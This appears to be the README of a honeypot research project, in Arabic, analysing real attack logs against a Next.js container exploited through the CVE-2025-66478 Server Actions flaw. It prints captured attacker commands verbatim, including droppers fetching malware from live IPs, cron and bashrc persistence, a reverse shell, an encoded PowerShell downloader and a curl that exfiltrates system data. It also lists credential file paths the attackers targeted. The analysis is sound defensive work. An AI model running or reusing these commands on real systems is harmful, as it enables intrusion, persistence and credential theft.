
تحليل سجلات هجمات حقيقية لـ CVE-2025-66478 (تنفيذ الأكواد عن بُعد في Server Actions الخاص بـ Next.js) مع عينات برمجيات خبيثة، وتتبع عنوان IP للمهاجم، ودروس في تعزيز أمان الحاويات.
يجمع هذا المشروع سجلات هجمات حقيقية تم تسجيلها من تطبيق Next.js 15.1.2 معرّض للإنترنت (يعمل داخل حاوية Docker). تُظهر هذه السجلات كيف يتم فحص ثغرة CVE-2025-66478 واستغلالها على نطاق واسع بواسطة أدوات هجوم آلية في البرية.
النطاق الزمني المسجَّل: 2025-12-04 ~ 2025-12-06 (حوالي 48 ساعة)
معلومات البيئة:
يحاول المهاجمون استغلال الثغرة لتنفيذ أوامر تقوم بتنزيل البرمجيات الخبيثة وتشغيلها.
| عنوان IP للهجوم | رابط الحمولة الخبيثة | الوصف |
|---|---|---|
| 216.158.232.43 | http://216.158.232.43:12000/sex.sh | شبكة بوتنت/برنامج تعدين |
| 38.207.161.212 | http://38.207.161.212/agent | برنامج وكيل خبيث (Agent) |
| 43.156.63.124 | http://43.156.63.124/tsd | زرع باب خلفي عبر cron |
| 154.38.121.219 | res.qiqigece.top/nginx3 | برنامج خبيث متنكر بهيئة nginx |
| 47.79.42.91 | iot.632313373.xyz/nz.sh | سكربت بوتنت لإنترنت الأشياء |
| 47.79.65.237 | sup001.oss-cn-hongkong.aliyuncs.com/python1.sh | برنامج تعدين/باب خلفي |
| 103.135.101.15 | http://103.135.101.15/wocaosinm.sh | سكربت خبيث |
| 38.12.24.231 | http://38.12.24.231/kworker | برنامج خبيث متنكر بهيئة عامل النواة (kernel worker) |
| 128.199.194.97 | http://128.199.194.97:9001/setup2.sh | سكربت تهيئة |
# 典型的 dropper 攻擊
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a
# 植入 cron 持久化後門
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd
# 複雜的持久化攻擊(嘗試多種下載方式 + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
mkdir -p $d;
if [ -w $d ]; then
p="$d/$n";
(curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
chmod +x $p;
nohup $p >/dev/null 2>&1 &
(crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
fi;
done
يحاول المهاجمون إنشاء اتصال صدفة عكسية للحصول على وصول تفاعلي.
# Bash 反向 shell
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"
يفترض المهاجمون أن الهدف هو نظام Windows، ويحاولون تنفيذ أوامر PowerShell.
# Base64 編碼的惡意 PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA
# 解碼後:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')
# 數學計算用於漏洞確認
powershell -c "41*271" # = 11111(特徵碼確認)
powershell -c "44225*41002" # = 1814113450
يحاول المهاجمون جمع معلومات النظام لاستخدامها في هجمات لاحقة.
# 系統資訊收集並外傳
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`
يحاول المهاجمون قراءة ملفات وبيانات اعتماد حساسة متنوعة.
متغيرات بيئة الحاوية التي تم تسريبها بنجاح من خلال الثغرة:
HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0
يستخدم المهاجمون استعلامات DNS لتسريب البيانات أو تأكيد وجود الثغرة:
ping 5a58e4a0.log.dnslog.pp.ua.
يعود سبب فشل معظم الهجمات إلى الطبيعة المُصغّرة لحاوية Alpine Linux:
| الأداة المفقودة | التأثير |
|---|---|
curl | تعذّر تنزيل الحمولة الخبيثة |
bash | تعذّر تنفيذ الصياغات الخاصة بـ bash (مثل الصدفة العكسية) |
على الرغم من أن wget متاح، إلا أن بعض السكربتات الخبيثة لا تزال تعتمد داخليًا على curl أو bash، مما يؤدي إلى فشل التنفيذ.
تحتوي السجلات على كميات كبيرة من البيانات المشفرة بـ Base64، وفيما يلي بعض نتائج فك الترميز:
# digest: 'cm9vdAo='
解碼: root
# digest: 'dGVzdAo='
解碼: test
# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
解碼: vulnerability_test
# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
解碼: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
# /tmp 目錄內容
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==
解碼:
total 20
drwxrwxrwt 1 root root 4096 Dec 5 18:00 .
drwxr-xr-x 1 root root 4096 Dec 4 13:36 ..
-rwxr-xr-x 1 root root 9848 Dec 5 18:00 INSTALL
فيما يلي عناوين IP المصدرة للهجوم التي تم تسجيلها:
يحاول المهاجمون استدعاء Server Action غير موجود:
Failed to find Server Action "dev-only-action"
Failed to find Server Action "non_existent_action_id"
Failed to find Server Action "test"
Failed to find Server Action "x"
يستغل المهاجمون حقل digest في رسائل الخطأ لتسريب البيانات:
Error: x
digest: 'cm9vdAo=' // Base64 編碼的 'root'
curl وbash وpython--read-onlyهذا المشروع مخصص لأغراض التعليم والبحث في مجال الأمن السيبراني فقط. جميع الهجمات المسجلة هي محاولات هجوم حقيقية استهدفت بيئة هونيبوت (Honeypot) بحثية. يرجى عدم استخدام هذه المعلومات لأي أغراض غير قانونية.
يحتوي هذا المشروع على عينات برمجيات خبيثة حقيقية تم استخراجها وتنزيلها من سجلات الهجمات. للتحليل التفصيلي، يرجى الاطلاع على:
MIT License
| الفئة | المسار |
|---|
| بيانات اعتماد سحابية | /root/.aws/credentials, /root/.aws/config |
/root/.config/gcloud/credentials.db | |
/root/.config/gcloud/application_default_credentials | |
| مفاتيح SSH | /root/.ssh/id_rsa, /root/.ssh/config |
| بيانات اعتماد Git | /root/.git-credentials, /root/.gitconfig |
| حاويات/Kubernetes | /root/.docker/config, /root/.kube/config |
/var/lib/kubelet/config.yaml | |
| التطبيقات | /proc/self/cwd/serviceAccountKey.json (Firebase) |
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma | |
| سجل الأوامر (Shell) | /root/.bash_history, /root/.zsh_history |
| أدوات سحابية | /root/.ossutilconfig (Alibaba Cloud OSS) |
/root/.npmrc | |
| إعدادات النظام | /etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow |
powershell | هجمات Windows غير فعّالة |
python | تعذّر استخدام أداة التنزيل Python |
| عنوان IP | الدولة/المنطقة (تقديري) | نوع الهجوم |
|---|
| 216.158.232.43 | الولايات المتحدة | Dropper |
| 38.165.44.205 | الولايات المتحدة | Dropper |
| 23.95.44.80 | الولايات المتحدة | Dropper |
| 154.38.121.219 | هونغ كونغ | برمجية خبيثة (nginx3) |
| 38.207.161.212 | الولايات المتحدة | وكيل (Agent) |
| 43.156.63.124 | الصين | باب خلفي عبر cron |
| 47.79.42.91 | الصين (Alibaba Cloud) | بوتنت لإنترنت الأشياء |
| 47.79.65.237 | الصين (Alibaba Cloud) | برنامج تعدين |
| 119.45.243.154 | الصين (Tencent Cloud) | برنامج تعدين |
| 144.22.210.54 | البرازيل | Dropper |
| 217.60.249.228 | السويد | Dropper |
| 154.26.192.32 | الولايات المتحدة | صدفة عكسية |
| 156.234.209.103 | غير معروف | حمولة PowerShell |
| 38.60.212.106 | الولايات المتحدة | جمع المعلومات |
| 103.135.101.15 | فيتنام | بوتنت |
| 128.199.194.97 | سنغافورة (DigitalOcean) | سكربت إعداد (Setup) |
| 38.12.24.231 | الولايات المتحدة | برنامج خبيث للثبات (استمرارية) |
| الملف | النوع | الحجم | المصدر | مستوى التهديد |
|---|
| nz.sh | Shell Script | 931 B | iot.632313373.xyz | متوسط |
| tsd.sh | Shell Script | 1.7 KB | 43.156.63.124 | مرتفع |
| tsd | ELF 64-bit | 6.8 MB | 43.156.63.124 | مرتفع |
| init.sh | Shell Script | 6.1 KB | AWS S3 | حرج |
| agent | ELF 64-bit | 23.7 MB | AWS S3 | حرج |
| Agtisx.exe | PE32+ (Windows) | 24.0 MB | AWS S3 | حرج |